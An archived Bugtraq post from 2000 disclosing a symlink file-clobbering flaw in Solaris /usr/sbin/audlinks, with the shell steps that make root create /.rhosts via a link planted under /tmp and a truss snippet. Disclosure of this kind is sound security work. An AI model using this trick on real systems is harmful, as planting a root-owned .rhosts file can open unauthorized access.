[18372] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

No subject found in mail header

daemon@ATHENA.MIT.EDU ("Optyx - Uberhax0r Communications")
Fri Dec 29 13:22:56 2000

Message-ID:  <20001228223450.467DD24CE95@lists.securityfocus.com>
Date:         Thu, 28 Dec 2000 14:34:50 -0800
Reply-To: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
From: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

/usr/sbin/audlinks has the following behavior:
$ id
uid=100(optyx) gid=1(other)
$ mkdir -p /tmp/b/dev
$ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
$ su root
Password:
# /usr/sbin/audlinks -r /tmp/b
# ls -l /.rhosts
-rw-r--r--   1 root     other          4 Dec 28 14:28 /.rhosts

truss output snippet:
open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4

this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to set the link then root has to run the program, but)

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[18372] in bugtraq

No subject found in mail header

daemon@ATHENA.MIT.EDU ("Optyx - Uberhax0r Communications")Fri Dec 29 13:22:56 2000

daemon@ATHENA.MIT.EDU ("Optyx - Uberhax0r Communications")
Fri Dec 29 13:22:56 2000